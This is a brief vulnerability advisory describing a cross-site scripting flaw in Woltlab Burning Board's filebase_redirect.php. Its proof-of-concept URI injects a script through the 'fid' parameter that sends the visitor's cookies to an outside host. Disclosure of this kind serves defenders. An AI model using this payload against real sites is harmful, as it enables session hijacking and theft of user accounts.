Woltlab Burning Board Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability

Woltlab Burning Board Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability

This issue can be exploited using a web client.

The following proof-of-concept URI is available:

http://www.example.com/filebase_redirect.php?fid='<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>